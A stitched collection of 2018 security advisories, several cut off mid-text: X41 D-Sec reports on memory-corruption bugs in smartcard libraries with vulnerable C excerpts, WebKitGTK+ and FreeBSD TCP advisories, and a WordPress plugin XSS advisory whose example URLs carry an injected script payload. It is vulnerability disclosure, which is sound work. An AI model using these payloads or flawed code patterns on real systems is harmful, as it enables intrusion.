https://security.FreeBSD.org/patches/SA-18:08/tcp-man-10.patch.asc # gpg --verify tcp-man-10.patch.asc [FreeBSD 11.x] # fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-man-11.patch # fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-man-11.patch.asc # gpg --verify tcp-man-11.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.h
X41 D-Sec GmbH Security Advisory X41-2018-004: Multiple Vulnerabilities in Yubico libykneomgr
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 X41 D-Sec GmbH Security Advisory: X41-2018-004 Multiple Vulnerabilities in Yubico libykneomgr == Overview - Confirmed Affected Versions: 0.1.9 Confirmed Patched Versions: - Vendor: Yubico / Depreciated Vendor URL: https://www.yubico.com/ Credit: X41 D-Sec GmbH, Eric Sesterhenn Status: Public Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2018-004-libykneomgr/ Summary and Impact - -- An out of bounds write and read was discovered when malicious responses from a smartcard are received. These might lead to memory corruptions. We assume that these are not easily exploitable. X41 did not perform a full test or audit on the software. Please note that the library is deprecated for more than a year and no update will be published by the vendor. Product Description - --- This is a C library to interact with the CCID-part of the YubiKey NEO. There is a command line tool "ykneomgr" for interactive use. It supports querying the YubiKey NEO for firmware version, operation mode (OTP/CCID) and serial number. You may also mode switch the device and manage applets (list, delete and install). Out of Bounds Read/Writes = Severity Rating: Medium Vector: APDU Response CVE: CWE: 120 CVSS Score: 7.1 (High) CVSS Vector: CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H Summary and Impact - -- File lib/backendpcsc.c contains the following code in function `backendappletlist()` {% highlight c %} { sizet i; sizet thislen = recv[length++]; for (i = 0; i < thislen; i++) { if (appletstr) { if (reallen + 2 > *len) { return YKNEOMGRBACKENDERROR; } sprintf (p, "%02x", recv[length]); p += 2; } reallen += 2; length++; } if (appletstr) { if (reallen + 1 > *len) { return YKNEOMGRBACKENDERROR; } *p = '\0'; p++; } reallen++; length += 2; } {% endhighlight %} There is an off-by-one write of a '\x00' when the sprintf() is called, since it terminates the string with a trailing null-byte. Additionally reads are performed based on thislen, which is retrieved from the data without further safety checks. Workarounds - --- It is advised to migrate to YubiKey Manager since the vendor does not support the library anymore and will not issue a patch. Timeline 2018-02-03 Issues found 2018-05-22 Vendor contacted 2018-05-22 Vendor reply 2018-06-05 Requesting technical feedback from the vendor 2018-06-06 Vendor confirms bug, but states that library is depreciated, will not be fixed 2018-08-11 Advisory released - -- X41 D-SEC GmbH, Dennewartstr. 25-27, D-52068 Aachen T: +49 241 9809418-0, Fax: -9 Unternehmenssitz: Aachen, Amtsgericht Aachen: HRB19989 Geschäftsführer: Markus Vervier -BEGIN PGP SIGNATURE- iQIzBAEBCAAdFiEEpwxVTgxAIcUvTugIo5Klpg50CxAFAlty3PMACgkQo5Klpg50 CxCvvA//RdQkadlV9yD1IFM7+lqkfMYCyeRyjEg19NWY7QL3Y6C0BeMNiMv/q74i TUw3G30X6ehgsaef5VWzpC7IibUC2DbltIZV3tYpNHePvc4GeMAl9dytqAy4MGnM EIxC7RrT4w85EDnaK9NvEXdo2QOlSuzt1MtePYhmoa23wZFH328w1WVhxgAYffna Cu7LCJIgWkh1y5jqc66553g34SRH3jiuVYSwTgIzC2MhVnXrjktbIwgddJLkV5Zr eRktqby13iWZns/oGE4GYjsmryoXaoDfGS5wuro7CNua+JqiEPwsH0bURvJDUxGi MvEEMl5TwoCeTzDqsofLBou1RNLVyI6W19MnYhNC6RCSUuFRXFF3nHqO7vQ5Gpft JS6URDUKWd/reh0Xwy3dlaEaXEIUPEHBcLwd0wmKqVgMTjUrOvgIAED8woS+Rzn9 qI+NbooNGt1OzlXR4RojKjRMJtWcwya8bhlNLk/ZFl/pokAEh6bZ1jcMg/U0NG9Q R4AI2u2NX3lE39ku/dcTQQCJpTTcr0DdGUw6kux0dkJXEhEc6YixgFzrHH1CPS/y 2sYLICX3iWjAtd81CO0PL4QXte2ekh8YWaf/1qV2BusOxwlHQjODO8o3kLueU2DC Uy4ftml35nu+qVS+vYA85N4+4/Fri6UkbjkgbI2fODgE3pImc+A= =dyfA -END PGP SIGNATURE-
X41 D-Sec GmbH Security Advisory X41-2018-005: Multiple Vulnerabilities in Apple smartcardservices
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 X41 D-Sec GmbH Security Advisory: X41-2018-005 Multiple Vulnerabilities in Apple smartcardservices === Overview - Confirmed Affected Versions: e3eb96a6eff9d02497a51b3c155a10fa5989021f Confirmed Patched Versions: 8eef01a5e218ae78cc358de32213b50a601662de Vendor: Apple Vendor URL: https://smartcardservices.github.io/ Credit: X41 D-Sec GmbH, Eric Sesterhenn Status: Public Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2018-005-smartcardservices/ Summary and Impact - -- Attackers with local access can exploit security issues in the smartcard driver. These result in memory corruptions, which might lead to code execution. Since smartcards can be used for authentication, the vulnerabilities may allow an attacker to login to the system without valid credentials as any user. X41 did not perform a full test or audit on the software. Product Description - --- The Smart Card Services project is comprised of several components which, when combined, provide the necessary abstraction layer and integration of smart cards into Apple’s CDSA implementation. Stack based buffer overflow === Severity Rating: Medium Vector: APDU Response CVE: CVE-2018-4300 CWE: 120 CVSS Score: 7.1 (High) CVSS Vector: CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H Summary and Impact - -- In file Tokend/CAC/CACRecord.cpp the function CACCertificateRecord::getDataAttribute() might overwrite the value certificate and possibly other stack data, if a smartcard provides malicious data. {% highlight c++ %} unsigned char command[] = { 0x80, 0x36, 0x00, 0x00, 0x64 }; unsigned char result[MAXBUFFERSIZE]; sizet resultLength = sizeof(result); uint8 certificate[CACMAXSIZECERT]; uint8 uncompressed[CACMAXSIZECERT]; sizet certificateLength = 0; try { PCSC::Transaction (cacToken); cacToken.select(mApplication); uint32t cacreturn; do { cacreturn = cacToken.exchangeAPDU(command, sizeof(command), result, resultLength); if ((cacreturn & 0xFF00) != 0x6300) CACError::check(cacreturn); sizet requested = command[4]; if (resultLength != requested + 2) PCSC::Error::throwMe(SCARDEPROTOMISMATCH); memcpy(certificate + certificateLength, result, resultLength - 2); certificateLength += resultLength - 2; // Number of bytes to fetch next time around is in the last byte // returned. command[4] = cacreturn & 0xFF; } while ((cacreturn & 0xFF00) == 0x6300); } catch (...) { return NULL; } {% endhighlight %} As long as the smartcard returns a return code of 0x63FF, more data is copied into the certificate buffer, causing a stack based overflow. A malicious smartcard is able to control all of the overflowed bytes. Workarounds - --- None Stack based buffer overflow with limited input == Severity Rating: Medium Vector: APDU Response CVE: CVE-2018-4301 CWE: 120 CVSS Score: 7.1 (High) CVSS Vector: CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H Summary and Impact - -- In file Tokend/PKCS11/GemaltoKeyHandle.cpp the function GemaltoPrivateKeyRecord::computeDecrypt() might overwrite the value strData if the supplied dataLength is too big. {% highlight c++ %} void GemaltoPrivateKeyRecord::computeDecrypt(GemaltoToken &gemaltoToken, CKULONG mech, const AccessCredentials *cred, unsigned char *data, sizet dataLength, unsigned char output, size_t &outputLength) { GemaltoToken::log("\nGemaltoPrivateKeyRecord::computeDecrypt \n"); GemaltoToken::log("GemaltoPrivateKeyRecord::computeDecrypt - mechanism <%lu>\n", mech); GemaltoToken::log("GemaltoPrivateKeyRecord::computeDecrypt - cred <%p>\n", cred); char strData[6000]; memset(strData, '\0', sizeof(strData)); char str = strData; for (size_t i=0; i - data <%s>\n", dataLength, strData); GemaltoToken::log("GemaltoPrivateKeyRecord::computeDecrypt - output <%p>\n", output); GemaltoToken::log("GemaltoPrivateKeyRecord::computeDecrypt - outputLength <%lu>\n", outputLength); {% endhighlight %} The attacker might control the data which is to be decrypted, but exploitation is limited by the sprintf() format string. Workarounds - --- None Timeline 2018-02-03 Issues found 2018-05-22 Vendor contacted 2
X41 D-Sec GmbH Security Advisory X41-2018-003: Multiple Vulnerabilities in pam_pkcs11
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 X41 D-Sec GmbH Security Advisory: X41-2018-003 Multiple Vulnerabilities in pam_pkcs11 == Overview - Confirmed Affected Versions: 0.6.9 Confirmed Patched Versions: - Vendor: Unmaintained Vendor URL: https://github.com/OpenSC/pampkcs11 Credit: X41 D-Sec GmbH, Eric Sesterhenn Status: Public Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2018-003-pampkcs11/ Summary and Impact - -- It is possible to replay an authentication by using a specially prepared smartcard or token in case pam-pkcs11 is compiled with NSS support. Furthermore two minor implementation issues have been identified. X41 did not perform a full test or audit on the software. Product Description - --- This Linux-PAM login module allows a X.509 certificate based user login. The certificate and its dedicated private key are thereby accessed by means of an appropriate PKCS #11 module. For the verification of the users' certificates, locally stored CA certificates as well as either online or locally accessible CRLs are used. Authentication Replay = Severity Rating: High Vector: Login attempt at compromised machine CVE: - CWE: 125 CVSS Score: 7.0 (High) CVSS Vector: CVSS:3.0/AV:P/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N Summary and Impact - -- A replay attack is possible due to a logic bug in file pampkcs11.c. In function `pamsmauthenticate()a nonce is generated and signed with the card to verify that the card holds the matching secret key, if a valid certifiate is found. This is done using the functiongetrandomvalue(), which in turn callsPK11GenerateRandom()`, which queries the smartcard for random data. This allows for a replay attack with a malicious smartcard. If a user plugins in his card into a compromised computer, the nonce and answer can be recorded by an attacker. The attacker then modifies a smartcard or a smartcard emulator to replay with the exact same nonce and signed data, which allows the attacker to login to another computer without having further access to the smartcard. Workarounds - --- Switch to pam_p11. Buffer Overflow === Severity Rating: Low Vector: Overly long user home directory CVE: - CWE: 121 CVSS Score: - CVSS Vector: - Summary and Impact - -- In file opensshmapper.c a stack based buffer overflow is possible if a user has a home directory with a length of more than 512 bytes. This allows to overwrite the passwd structure and possibly the return address in `opensshmappermatchuser()`; {% highlight c %} opensshmapper.c static int opensshmappermatchuser(X509 *x509, const char *user, void *context) { struct passwd *pw; char filename[512]; if (!x509) return -1; if (!user) return -1; pw = getpwnam(user); if (!pw || isemptystr(pw->pwdir) ) { DBG1("User '%s' has no home directory",user); return -1; } sprintf(filename,"%s/.ssh/authorizedkeys",pw->pwdir); return opensshmappermatchkeys(x509,filename); } {% endhighlight %} Workarounds - --- Switch to pam_p11. Memory not cleaned properly before free() = Severity Rating: Low Vector: - CVE: - CWE: 244 CVSS Score: - CVSS Vector: - _ Summary and Impact - -- In several places memory is set to zero using memset() and passed on to free() afterwards. This is a pattern which modern compilers optimize away, which renders the call to memset() useless. This causes sensitive data such as passwords to remain in the memory, which defeats the original intention of the code. {% highlight c %} memset(password, 0, strlen(password)); free(password); {% endhighlight %} Workarounds - --- Switch to pam_p11. Timeline 2018-02-03 Issues found 2018-04-18 Vendor contacted 2018-04-18 Vendor reply 2018-05-18 Technical details provided 2018-05-24 Private git branch created, issues fixed 2018-08-08 Patched version released at https://github.com/x41sec/pam_pkcs11 2018-08-11 Advisory released - -- X41 D-SEC GmbH, Dennewartstr. 25-27, D-52068 Aachen T: +49 241 9809418-0, Fax: -9 Unternehmenssitz: Aachen, Amtsgericht Aachen: HRB19989 Geschäftsführer: Markus Vervier -BEGIN PGP SIGNATURE- iQIzBAEBCAAdFiEEpwxVTgxAIcUvTugIo5Klpg50CxAFAlty3K4ACgkQo5Klpg50 CxDfHhAAiANUMfz5YSGvQS8HJYcAwiDwL5Z6TRJEKg4RRS94hehzpDCHaVaABsnB 6BtRCx6Jp8hDs9Iz36y+E8txg349OSUyrRSL9RQ6/G7MrLOJ0kOxijkAWbvJg/nD elgsGa65DKWwqHvc5AsRXxWZFtyNs6CTWGyfJJvyC3cpHM0E0jru5xjuwklm1YAG DOcqadZav2FPzKJz5tYsDa42aAWYyjE2MMXzkY7kT3aQ2G70DhN2mJqnnmsmMFcH GZaZO+4SaWq97SNVzzvKXk9m0T8S2HmumAF8g9mGLuCTfBVsbi4DmGyb9mvZOK2S djwBCHf0rRqXP83hszwHD/zQoW796r7tj9PGmKmvRoDeX76aGuLgQoZ55zged9R1 QkPiD89w+7YANMHumsfLXgXRdhxWaObFvtJWtFCd+v0iS5r249zYukJXn89lnY4p 1x3eBPOzYfSvdHBV0d8/l8uiqZGM9mN55Y4AvkOQ
X41 D-Sec GmbH Security Advisory X41-2018-002: Multiple Vulnerabilities in OpenSC
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 X41 D-Sec GmbH Security Advisory: X41-2018-002 Multiple Vulnerabilities in OpenSC == Overview - Confirmed Affected Versions: 0.18.0 Confirmed Patched Versions: possibly 0.19.0 Vendor: OpenSC Vendor URL: https://github.com/OpenSC/OpenSC Credit: X41 D-Sec GmbH, Eric Sesterhenn Status: Public Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2018-002-OpenSC/ Summary and Impact - -- Multiple issues have been identified in OpenSC, ranging from stack based buffer overflows to out of bounds reads and writes on the heap. They can be triggered by malicious smartcards sending malformed responses to APDU commands. Additionally to those fixes reported here, a lot of minor issues (eg. OOB reads and similar) have been reported and fixed. The OpenSC team (especially Frank Morgner) did an excellent job on identifying and fixing further issues. Due to the large amount of issues, no individual issues have been rated with CVSS / CVE ID yet. X41 did not perform a full test or audit on the software, but tried to help identifying as many bugs as possible in over the course of a year. Product Description - --- OpenSC provides a set of libraries and utilities to work with smart cards. Its main focus is on cards that support cryptographic operations, and facilitate their use in security applications such as authentication, mail encryption and digital signatures. OOB Write in musclelistfiles() == In function muscle_list_files() in file src/libopensc/card-muscle.c an out of bounds write might occur, since bufLen is not checked. {% highlight c %} static int musclelistfiles(sccardt card, u8 *buf, sizet bufLen) { muscleprivate_t priv = MUSCLEDATA(card); mscfst fs = priv->fs; int x; int count = 0; mscfscheckcache(priv->fs); for(x = 0; x < fs->cache.size; x++) { u8 oid= fs->cache.array[x].objectId.id; scdebug(card->ctx, SCLOGDEBUGNORMAL, "FILE: %02X%02X%02X%02X\n", oid[0],oid[1],oid[2],oid[3]); if(0 == memcmp(fs->currentPath, oid, 2)) { buf[0] = oid[2]; buf[1] = oid[3]; if(buf[0] == 0x00 && buf[1] == 0x00) continue; /* No directories/null names outside of root */ buf += 2; count+=2; } } return count; } {% endhighlight %} OOB Write in tcosselectfile() = In function tcos_select_file) in file src/libopensc/card-tcos.c a filename is extracted from an APDU response and written into the internal file->name variable. {% highlight c %} case 0x84: memcpy(file->name, d, len); file->namelen = len; break; {% endhighlight %} No check is performed whether the string retrieved from the card fits into the buffer, which could trigger an OOB write. OOB Write in pivvalidategeneral_authentication() In case piv_validate_general_authentication()in src/libopensc/card-piv.c is called with a datalen parameter greater than 4096, an out of bound write occurs. Currently no caller seems to do this. OOB Write in gemsafegetcert_len() = The function gemsafe_get_cert_len() in file src/libopensc/pkcs15-gemsafeV1.c might write beyond the gemsafe_prkeys and gemsafe_cert arrays in case more than 12 containers are stored on the card. {% highlight c %} ind = 2; /* skip length */ while (ibuf[ind] == 0x01) { if (ibuf[ind+1] == 0xFE) { gemsafeprkeys[i].ref = ibuf[ind+4]; sclog(card->ctx, "Key container %d is allocated and uses keyref %d", i+1, gemsafeprkeys[i].ref); ind += 9; } else { gemsafeprkeys[i].label = NULL; gemsafecert[i].label = NULL; sc_log(card->ctx, "Key container %d is unallocated", i+1); ind += 8; } i++; } {% endhighlight %} OOB Write in utilaclto_str() In function util_acl_to_str() in file src/tools/util.c no checks are performed whether the string put together fits into line, which could be abused to trigger limited out of bounds writes. OOB Write in readpublickey() and readprivatekey() = In function read_public_key() in file src/tools/cryptoflex-tool.c the bufsize variable is overwritten with file->size retrieved from the smartcard. This
X41 D-Sec GmbH Security Advisory X41-2018-001: Multiple Vulnerabilities in Yubico Piv
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 X41 D-Sec GmbH Security Advisory: X41-2018-001 Multiple Vulnerabilities in Yubico Piv == Overview - Confirmed Affected Versions: 1.5.0 Confirmed Patched Versions: 1.6.0 Vendor: Yubico Vendor URL: https://www.yubico.com/ Vendor Advisory URL: https://www.yubico.com/support/security-advisories Credit: X41 D-Sec GmbH, Eric Sesterhenn Status: Public Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2018-001-Yubico-Piv/ Summary and Impact - -- A buffer overflow and an out of bounds memory read were identified in the yubico-piv-tool-1.5.0, these can be triggered by a malicious token. X41 did not perform a full test or audit on the software. Product Description - --- YubiKey 4, YubiKey 4 Nano, YubiKey 4C, YubiKey 4C Nano, and YubiKey NEO provide Smart Card functionality based on the Personal Identity Verification (PIV) interface specified in NIST SP 800-73, “Cryptographic Algorithms and Key Sizes for PIV.” Out of Bounds Write via Malicious APDU == Severity Rating: High Vector: APDU Response CVE: CVE-2018-14779 CWE: 120 CVSS Score: 7.1 (High) CVSS Vector: CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H Summary and Impact - -- File lib/ykpiv.c contains the following code in function ykpiv_transfer_data() {% highlight c %} if(*outlen + recvlen - 2 > maxout) { fprintf(stderr, "Output buffer to small, wanted to write %lu, max was %lu.", *outlen + recvlen - 2, maxout); } if(outdata) { memcpy(outdata, data, recvlen - 2); outdata += recvlen - 2; *outlen += recv_len - 2; } {% endhighlight %} It is clearly checked whether the buffer is big enough to hold the data copied using memcpy(), but no error handling happens to avoid the memcpy() in such cases. This code path can be triggered with malicious data coming from a smartcard. Workarounds - --- None Out of Bounds Read via malicious APDU = Severity Rating: LOW Vector: APDU Response CVE: CVE-2018-14780 CWE: 125 CVSS Score: 2.2 (Low) CVSS Vector: CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N Summary and Impact - -- File lib/ykpiv.c contains the following code in function _ykpiv_fetch_object() {% highlight c %} if(sw == SWSUCCESS) { sizet outlen; int offs = ykpivgetlength(data + 1, &outlen); if(offs == 0) { return YKPIVSIZEERROR; } memmove(data, data + 1 + offs, outlen); *len = outlen; return YKPIVOK; } else { return YKPIVGENERICERROR; } {% endhighlight %} In the end, a memmove() occurs with a length retrieved from APDU data. This length is not checked if it is outside of the APDU data retrieved. Therefore the memmove() could copy bytes behind the allocated data buffer into this buffer. Workarounds - --- None Timeline 2018-02-03 Issues found 2018-05-22 Vendor contacted 2018-05-22 Vendor reply 2018-06-05 Requesting technical feedback from the vendor 2018-06-06 Vendor confirms bug 2018-08-01 CVE ID requested 2018-08-02 CVE ID assigned 2018-08-08 Patched version released by vendor 2018-08-11 Advisory released - -- X41 D-SEC GmbH, Dennewartstr. 25-27, D-52068 Aachen T: +49 241 9809418-0, Fax: -9 Unternehmenssitz: Aachen, Amtsgericht Aachen: HRB19989 Geschäftsführer: Markus Vervier -BEGIN PGP SIGNATURE- iQIzBAEBCAAdFiEEpwxVTgxAIcUvTugIo5Klpg50CxAFAlty2NwACgkQo5Klpg50 CxADgQ//UhL2gZIdimeg1HuJZRz0YcjXMvhGhZoCXOeIcw5+GGrYbnlHX0fwe5eq w9LGLYFDxvoa4ubassR9B+rFVbQ2hg9IVK1rv/VublRRjPZhMyZuGgpKjSPXptn1 /vsQ3SW75SX6c3JKKgyam5tXP/4ke3+1Xpb9W+NpXkhXtk3x78PJDSQMNXdXXWTT WsSYd7icdUI8Z96DkPUntpgbohPu2Si3G16JnHbRYKI0Mjylz6cgVkcYe6whIehq DefhoAFyIrPHPjXHr7Gy4BJnxgyEmuNBfVvNQPGd3YgxadGdozFi733Gnjoo1CAn gJl35rAL794Ww2orISm8oZXUJpTYsi53l4dS4rSFmPnj27bHDSh0s8PcmVP6K0UN 51vC/FO+1J8PRcbZdGp71ePNRYvNNwhTIecY70dn4hX12n/82V466bRGjpLXtNBM 8+0of95VcZQyJFXNNzyTvXMQVA25Lcbo0YkScwaPm6Ob1S1NtzsucojF5TlrXo7e zVAkAS9NqsWTJZVlPQIXdEpQarU8GcPW26BsjB0YpAHvsrywjWbSWLUfI7GFAAhF 25f5NH3bT8ti1wzTnEOs5/0vl9yL5IMVOcggxsT9DbirqVi4qiCPqXg+6v8GzT18 gNTz9w19ZBMehkc400u8PuBzcTlTjiSpdi2IsqaxQoxIpkg8zGw= =fNlG -END PGP SIGNATURE-
WebKitGTK+ and WPE WebKit Security Advisory WSA-2018-0006
WebKitGTK+ and WPE WebKit Security AdvisoryWSA-2018-0006 Date reported : August 07, 2018 Advisory ID : WSA-2018-0006 WebKitGTK+ Advisory URL : https://webkitgtk.org/security/WSA-2018-0006.html WPE WebKit Advisory URL : https://wpewebkit.org/security/WSA-2018-0006.html CVE identifiers : CVE-2018-4246, CVE-2018-4261, CVE-2018-4262, CVE-2018-4263, CVE-2018-4264, CVE-2018-4265, CVE-2018-4266, CVE-2018-4267, CVE-2018-4270, CVE-2018-4271, CVE-2018-4272, CVE-2018-4273, CVE-2018-4278, CVE-2018-4284, CVE-2018-12911. Several vulnerabilities were discovered in WebKitGTK+ and WPE WebKit. CVE-2018-4246 Versions affected: WebKitGTK+ before 2.20.4 and WPE WebKit before 2.20.1. Credit to OSS-Fuzz. Processing maliciously crafted web content may lead to arbitrary code execution. A type confusion issue was addressed with improved memory handling. CVE-2018-4261 Versions affected: WebKitGTK+ before 2.20.4 and WPE WebKit before 2.20.2. Credit to Omair working with Trend Micro's Zero Day Initiative. Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling. CVE-2018-4262 Versions affected: WebKitGTK+ before 2.20.4 and WPE WebKit before 2.20.2. Credit to Mateusz Krzywicki working with Trend Micro's Zero Day Initiative. Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling. CVE-2018-4263 Versions affected: WebKitGTK+ before 2.20.4 and WPE WebKit before 2.20.2. Credit to Arayz working with Trend Micro's Zero Day Initiative. Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling. CVE-2018-4264 Versions affected: WebKitGTK+ before 2.20.4 and WPE WebKit before 2.20.2. Credit to OSS-Fuzz, Yu Zhou and Jundong Xie of Ant-financial Light- Year Security Lab. Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling. CVE-2018-4265 Versions affected: WebKitGTK+ before 2.20.4 and WPE WebKit before 2.20.2. Credit to cc working with Trend Micro's Zero Day Initiative. Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling. CVE-2018-4266 Versions affected: WebKitGTK+ before 2.20.4 and WPE WebKit before 2.20.2. Credit to OSS-Fuzz. A malicious website may be able to cause a denial of service. A race condition was addressed with additional validation. CVE-2018-4267 Versions affected: WebKitGTK+ before 2.20.4 and WPE WebKit before 2.20.2. Credit to Arayz of Pangu team working with Trend Micro's Zero Day Initiative. Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling. CVE-2018-4270 Versions affected: WebKitGTK+ before 2.20.4 and WPE WebKit before 2.20.2. Credit to OSS-Fuzz. Processing maliciously crafted web content may lead to an unexpected application crash. A memory corruption issue was addressed with improved memory handling. CVE-2018-4271 Versions affected: WebKitGTK+ before 2.20.2. Credit to OSS-Fuzz. Processing maliciously crafted web content may lead to an unexpected application crash. A memory corruption issue was addressed with improved input validation. CVE-2018-4272 Versions affected: WebKitGTK+ before 2.20.4 and WPE WebKit before 2.20.2. Credit to OSS-Fuzz. Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling. CVE-2018-4273 Versions affected: WebKitGTK+ before 2.20.4 and WPE WebKit before 2.20.2. Credit to OSS-Fuzz. Processing maliciously crafted web content may lead to an unexpected application crash. A memory corruption issue was addressed with improved input validation. CVE-2018-4278 Versions affected: WebKitGTK+ before 2.20.4 and WPE WebKit before 2.20.2. Credit to Jun Kokatsu (@shhnjk). A malicious website may exfiltrate audio data cross-origin. Sound fetched through audio elements may be exfiltrated cross-origin. This issue was addressed with improved audio taint tracking. CVE-2018-4284 Versions affected: WebKitGTK+ before 2.20.4 and WPE WebKit before 2.20.2. Credit to OSS-Fuzz. Processing malici
FreeBSD Security Advisory FreeBSD-SA-18:08.tcp
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-18:08.tcpSecurity Advisory The FreeBSD Project Topic: Resource exhaustion in TCP reassembly Category: core Module: inet Announced: 2018-08-06 Credits:Juha-Matti Tilli from Aalto University, Department of Communications and Networking and Nokia Bell Labs Affects:All supported versions of FreeBSD. Corrected: 2018-08-06 18:46:09 UTC (stable/11, 11.1-STABLE) 2018-08-06 17:47:47 UTC (releng/11.2, 11.2-RELEASE-p1) 2018-08-06 17:48:46 UTC (releng/11.1, 11.1-RELEASE-p12) 2018-08-06 18:47:03 UTC (stable/10, 10.4-STABLE) 2018-08-06 17:50:40 UTC (releng/10.4, 10.4-RELEASE-p10) CVE Name: CVE-2018-6922 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background The Transmission Control Protocol (TCP) of the TCP/IP protocol suite provides a connection-oriented, reliable, sequence-preserving data stream service. To transmit a stream of data, TCP breaks the data stream into segments for transmission through the Internet, and reassembles the segments at the receiving side to recreate the data stream. II. Problem Description One of the data structures that holds TCP segments uses an inefficient algorithm to reassemble the data. This causes the CPU time spent on segment processing to grow linearly with the number of segments in the reassembly queue. III. Impact An attacker who has the ability to send TCP traffic to a victim system can degrade the victim system's network performance and/or consume excessive CPU by exploiting the inefficiency of TCP reassembly handling, with relatively small bandwidth cost. IV. Workaround As a workaround, system administrators should configure their systems to only accept TCP connections from trusted end-stations, if it is possible to do so. For systems which must accept TCP connections from untrusted end-stations, the workaround is to limit the size of each reassembly queue. The capability to do that is added by the patches noted in the "Solution" section below. V. Solution As a temporary solution to this problem, these patches limit the size of each TCP connection's reassembly queue. The value is controlled by a sysctl (net.inet.tcp.reass.maxqueuelen), which sets the maximum number of TCP segments that can be outstanding on a session's reassembly queue. This value defaults to 100. Note that setting this value too low could impact the throughput of TCP connections which experience significant loss or reordering. However, the higher this number is set, the more resources can be consumed on TCP reassembly processing. Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Afterward, reboot the system. 2) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install Afterward, reboot the system. 3) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 10.4] # fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-10.patch # fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-10.patch.asc # gpg --verify tcp-10.patch.asc [FreeBSD 11.x] # fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-11.patch # fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-11.patch.asc # gpg --verify tcp-11.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/10/r337392 releng/10.4/ r337389 stable/11/r337391 releng/11.1/ r337388 releng/11.2/
DefenseCode ThunderScan SAST Advisory: WordPress Strong Testimonials Plugin Multiple XSS Security Vulnerabilities
DefenseCode ThunderScan SAST Advisory: WordPress Strong Testimonials Plugin Multiple XSS Security Vulnerabilities Advisory ID:DC-2018-05-007 Advisory Title: WordPress Strong Testimonials Plugin Multiple XSS Vulnerabilities Advisory URL: http://www.defensecode.com/advisories.php Software: WordPress Strong Testimonials plugin Language: PHP Version:2.31.4 and below Vendor Status: Vendor contacted, update released Release Date: 2018/07/24 Risk: Medium 1. General Overview === During the security audit of Strong Testimonials plugin for WordPress CMS, multiple XSS vulnerabilities were discovered using DefenseCode ThunderScan application source code security analysis platform. More information about ThunderScan is available at URL: http://www.defensecode.com 2. Software Overview According to the plugin developers, with Strong Testimonials plugin you will be collecting and publishing your testimonials or reviews. Beginners and pros alike will appreciate the wealth of flexible features refined over 4 years from user feedback and requests. According to wordpress.org, it has more than 50,000 active installs. Homepage: https://wordpress.org/plugins/strong-testimonials/ 3. Vulnerability Description During the security analysis, ThunderScan discovered Cross-Site Scripting vulnerabilities in Strong Testimonials WordPress plugin. The Cross-Site Scripting vulnerability can enable the attacker to construct the URL that contains malicious JavaScript code. If the administrator of the site makes a request to such an URL, the attacker's code will be executed, with unrestricted access to the WordPress site in question. The attacker can entice the administrator to visit the URL in various ways, including sending the URL by email, posting it as a part of the comment on the vulnerable site or another forum. 3.1 Cross-Site Scripting Vulnerable Function: echo() Vulnerable Variable: $_REQUEST['id'] Vulnerable URL: http://vulnerablesite.com/wp-admin/edit.php?post_type=wpm-testimonial&page=testimonial-views&action=edit&id=2";>alert(42) File: strong-testimonials/admin/views.php - 48 wpmtst_view_settings( $_REQUEST['action'], $_REQUEST['id'] ); ... 106 function wpmtst_view_settings( $action = '', $view_id = null ) { ... 213 - 3.2 Cross-Site Scripting Vulnerable Function: echo() Vulnerable Variable: $_REQUEST['id'] Vulnerable URL: http://vulnerablesite.com/wp-admin/edit.php?post_type=wpm-testimonial&page=testimonial-views&action=edit&id=2";>alert(42) File: strong-testimonials/admin/views.php - 48 wpmtst_view_settings( $_REQUEST['action'], $_REQUEST['id'] ); ... 106 function wpmtst_view_settings( $action = '', $view_id = null ) { ... 219 - File: strong-testimonials/admin/partials/views/view-shortcode.php - 5 $shortcode .= ''; ... 21 - 4. Solution === After the vulnerabilities were reported the vendor 